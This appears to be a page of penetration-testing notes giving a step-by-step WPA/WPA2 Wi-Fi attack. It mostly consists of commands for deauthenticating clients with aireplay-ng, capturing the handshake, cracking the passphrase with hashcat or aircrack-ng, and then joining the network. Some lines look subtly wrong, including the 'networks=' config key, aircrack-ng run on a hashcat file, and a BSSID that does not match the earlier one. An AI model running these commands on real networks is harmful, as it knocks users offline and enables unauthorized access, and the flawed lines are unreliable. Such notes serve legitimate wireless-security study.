WPA/ WPA2

if 802.11w is in use you need to wait until a client connects and can't deauth them

Deauth Attack:

Attack will requires multiple windows

Window 1:

# start listening and recording traffic
airodump-ng --bssid 30:46:9A:FC:53:C8 -c 2 -w wpa wlan0mon

Window 2:

# deauth specific client traffic: 
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 -h B8:2A:A9:56:95:C8 wlan0mon
# deauth all traffic: 
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 wlan0mon

Crack:

# Hashcat
hcxpcapngtool -o wpa.hc22000 wpa-01.cap
hashcat -m 22000 wpa.hc22000 /usr/share/wordlist.txt

# Aircrack-ng 
aircrack-ng wpa.hc22000 -w /usr/share/wordlist.txt

We can confirm it's cracking using 'airdecap-ng' to decrypt the capture packets:

airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

Connect by creating a wpa.conf file:

networks={
    ssid="SWCC"
    scan_ssid=1
    key_mgmt=WPA-PSK
    psk="chameleon"
}

Use wpa_supplicant to connect to the wireless network:

sudo wpa_supplicant -Dnl80211 -iwlan0 -c ./wpa.conf

PreviousWEP NextWPA Enterprise

Last updated 2 years ago